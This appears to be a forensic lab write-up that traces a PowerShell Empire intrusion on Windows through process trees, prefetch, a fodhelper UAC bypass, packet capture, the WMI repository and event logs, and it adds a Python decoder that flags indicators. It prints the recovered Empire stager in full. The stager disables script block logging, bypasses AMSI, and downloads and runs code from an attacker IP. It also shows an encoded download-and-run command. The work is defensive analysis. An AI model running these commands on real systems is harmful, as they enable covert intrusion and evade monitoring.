https://itshareit.tistory.com/3 (blocking Windows Update)

Initial setup

(FIOS#03) 4. 파워셸 포렌식 조사 기법.pdf (PowerShell forensic investigation techniques)

situational awareness

Checking the Empire connection stage

PowerShell does not appear on the taskbar, but it does show up in the process information

PID 5012, PID 452

The privilege-escalated agent had conhost as its parent in the process tree.

(Process Monitor result on Windows) HTTP communication with 192.168.134.102

IP of the Empire attacker OS: 192.168.134.102

Prefetch analysis

Download WinPrefetchView

Shows file name and path, creation time, modification time, and last run time

WinPrefetchView result after reinstalling and connecting for the first time

result_prefetch.xlsx

CKQSXC5G.PGK.PS1 (the only .ps1 file captured at the time of the first PowerShell connection)

Check whether it is related to the creation of the PS1 file during the connection process

Fodhelper (bypassuac, registry analysis)

In WinPrefetchView, the run counter is 2 (two attempts were made)

Confirmed that fodhelper was invoked during Empire privilege escalation.

The execution occurred while powershell was running fodhelper.

Process Explorer analysis

fodhelper registry analysis

PID

powershell => conhost => privilege-escalated powershell agent

fodhelper-related registry entries

Maximum allowed

Remove the related registry entries

Packet capture (WSMan)

bypass_mimikatz.pcapng

(ip.src / ip.dst is the Kali IP address, port 8080, HTTP over TCP)

File system

C:\Windows\System32\wbem\Repository\OBJECTS.DATA

Search for powershell.exe

If($PSVeRSiONTaBlE.PSVerSion.MaJor -ge 3){$GPF=[REf].ASsemBly.GEtTYpe('System.Management.Automation.Utils')."GETField"('cachedGroupPolicySettings','N'+'onPublic,Static');IF($GPF){$GPC=$GPF.GetVaLuE($nUll);IF($GPC['ScriptB'+'lockLogging']){$GPC['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging']=0;$GPC['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging']=0}$vAL=[ColLeCTIOns.GeNeric.DicTIOnaRY[StrInG,SySTEm.ObJeCt]]::New();$vaL.Add('EnableScriptB'+'lockLogging',0);$Val.ADd('EnableScriptBlockInvocationLogging',0);$GPC['HKEY_LOCAL_MACHINE\\\\Software\\\\Policies\\\\Microsoft\\\\Windows\\\\PowerShell\\\\ScriptB'+'lockLogging']=$vaL}ElsE{[ScriPTBloCK]."GetFiELD"('signatures','N'+'onPublic,Static').SetVAluE($nuLl,(NEW-ObjeCT COlLEctIoNs.GEnerIC.HAShSET[STRiNG]))}[REf].AsSeMBlY.GeTTypE('System.Management.Automation.AmsiUtils')|?{$}|%{$.GETFIeLD('amsiInitFailed','NonPublic,Static').SetVALue($nUlL,$trUe)};};[SYstEM.NeT.SErVIcEPoINTMAnaGeR]::EXpECT100COnTiNUe=0;$wc=NEW-ObJect SysTem.NEt.WebCLiEnT;$u='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko';$wC.HEAdErs.ADD('User-Agent',$u);$wc.ProxY=[SyStem.NeT.WEbREQUeST]::DEFaulTWEbPRoxY;$wC.PrOXy.CrEdEntiaLS = [SYSTeM.NEt.CreDEnTIaLCACHe]::DEFaULtNeTwoRKCreDENTiALs;$Script:Proxy = $wc.Proxy;$K=[SYStEm.TEXT.ENCoDInG]::ASCII.GETByteS('Rir]p306Z7go/k8;4Sxf:QcA9=2<tB5');$R={$D,$K=$ArGS;$S=0..255;0..255|%{$J=($J+$S[$]+$K[$%$K.CouNt])%256;$S[$],$S[$J]=$S[$J],$S[$*]};$D|%{$I=($I+1)%256;$H=($H+$S[$I])%256;$S[$I],$S[$H]=$S[$H],$S[$I];$_-BxOr$S[($S[$I]+$S[$H])%256]}};$ser='http://192.168.226.102:8080';$t='/news.php';$wC.HEADERS.AdD("Cookie","session=ptzuJbUfLmH/d9X67Yh2X9NM/6o=");$dAta=$WC.DoWnloadDAtA($ser+$t);$IV=$daTA[0..3];$daTA=$DatA[4..$DAtA.lenGTH];-jOin[CHar[]](& $R $DAta ($IV+$K))|IEX

dwBnAGUAdAAgACIAaAB0AHQAcAA6AC8ALwAxADIANwAuADAALgAwAC4AMQAvAGwAYQB1AG4AYwBoAGUAcgAuAGIAYQB0ACIAIAAtAG8AdQB0AGYAaQBsAGUAIAAiAGwAYQB1AG4AYwBoAGUAcgAuAGIAYQB0ACIAOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgAC4AXABsAGEAdQBuAGMAaABlAHIALgBiAGEAdAAgAC0AVwBhAGkAdAAgAC0AcABhAHMAcwB0AGgAcgB1ACAALQBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAIABIAGkAZABkAGUAbgA7AA==

wget "http://127.0.0.1/launcher.bat" -outfile "launcher.bat"; Start-Process -FilePath .\launcher.bat -Wait -passthru -WindowStyle Hidden;
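The base64 string above is the -EncodedCommand form of the launcher line (UTF-16LE text, base64-encoded), which is why it decodes to the wget / Start-Process command shown. The following Python is an added example, not code from the write-up: it decodes such a blob, uses a heuristic to recognise UTF-16LE base64 arguments in recovered command lines, undoes the 'a'+'b' string splitting the launcher uses, and flags the defender-relevant indicators visible in the launcher text (Script Block Logging forced to 0, the amsiInitFailed field, the C2 URL and session cookie header). The launcher excerpts and the 90% NUL-byte threshold are constructed for this example.

```python
import base64
import re

# Base64 blob copied from the write-up above (recovered from OBJECTS.DATA and the
# PowerShell Operational log). It is the -EncodedCommand form of the launcher line.
ENCODED_COMMAND = "dwBnAGUAdAAgACIAaAB0AHQAcAA6AC8ALwAxADIANwAuADAALgAwAC4AMQAvAGwAYQB1AG4AYwBoAGUAcgAuAGIAYQB0ACIAIAAtAG8AdQB0AGYAaQBsAGUAIAAiAGwAYQB1AG4AYwBoAGUAcgAuAGIAYQB0ACIAOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgAC4AXABsAGEAdQBuAGMAaABlAHIALgBiAGEAdAAgAC0AVwBhAGkAdAAgAC0AcABhAHMAcwB0AGgAcgB1ACAALQBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAIABIAGkAZABkAGUAbgA7AA=="

# Short excerpts of the launcher from the page, constructed here as test input.
# Matching is case-insensitive because the real launcher randomises casing.
LAUNCHER_EXCERPTS = [
    "$GPC['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging']=0",
    "$.GETFIeLD('amsiInitFailed','NonPublic,Static').SetVALue($nUlL,$trUe)",
    "$ser='http://192.168.226.102:8080';$t='/news.php';",
    '$wC.HEADERS.AdD("Cookie","session=ptzuJbUfLmH/d9X67Yh2X9NM/6o=")',
]

B64_RE = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")
CONCAT_RE = re.compile(r"'([^']*)'\s*\+\s*'([^']*)'")

# Indicator name -> pattern applied to the de-obfuscated launcher text.
INDICATORS = {
    "script_block_logging_disabled": re.compile(r"EnableScriptBlockLogging\W*=\s*0", re.I),
    "amsi_bypass": re.compile(r"amsiInitFailed", re.I),
    "group_policy_cache_tamper": re.compile(r"cachedGroupPolicySettings", re.I),
    "c2_url": re.compile(r"https?://[\w.\-]+(?::\d+)?", re.I),
    "session_cookie": re.compile(r'"Cookie"\s*,\s*"session=', re.I),
}


def decode_encoded_command(token):
    """Decode a PowerShell -EncodedCommand argument (base64 of UTF-16LE text)."""
    raw = base64.b64decode(token, validate=True)
    return raw.decode("utf-16-le")


def looks_like_encoded_command(token, min_len=16, nul_ratio=0.9):
    """Heuristic (assumed threshold): valid base64 whose decoded bytes look like
    UTF-16LE ASCII, i.e. nearly every odd byte is NUL."""
    if len(token) < min_len or len(token) % 4 or not B64_RE.match(token):
        return False
    try:
        raw = base64.b64decode(token, validate=True)
    except ValueError:
        return False
    if len(raw) < 2:
        return False
    nul = sum(1 for b in raw[1::2] if b == 0)
    return nul / (len(raw) // 2) >= nul_ratio


def deobfuscate_strings(text):
    """Join 'Scr'+'ipt' style concatenations until nothing changes, so keyword
    matching sees the real string the launcher builds at run time."""
    while True:
        joined = CONCAT_RE.sub(lambda m: "'" + m.group(1) + m.group(2) + "'", text)
        if joined == text:
            return text
        text = joined


def scan_launcher(text):
    """Return {indicator: [matches]} for every indicator found in the text."""
    clean = deobfuscate_strings(text)
    found = {}
    for name, pattern in INDICATORS.items():
        hits = pattern.findall(clean)
        if hits:
            found[name] = hits
    return found


if __name__ == "__main__":
    if looks_like_encoded_command(ENCODED_COMMAND):
        decoded = decode_encoded_command(ENCODED_COMMAND)
        print("decoded:", decoded)
        print("indicators in decoded command:", scan_launcher(decoded))
    print("indicators in launcher:", scan_launcher(" ".join(LAUNCHER_EXCERPTS)))
```

Run it over the command lines pulled from OBJECTS.DATA or event ID 4104 script blocks; anything that trips script_block_logging_disabled or amsi_bypass is worth pulling the full block for, and the c2_url hits line up directly with the pcap filter used above.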

Event log

Microsoft-Windows-PowerShell%4Operational.evtx

(identical to what was found earlier in the file system)

Similar content can be found in the Windows PowerShell event log under C:\Windows\System32\winevt\Logs

Note 0x3EX, NT Authority, WORKGROUP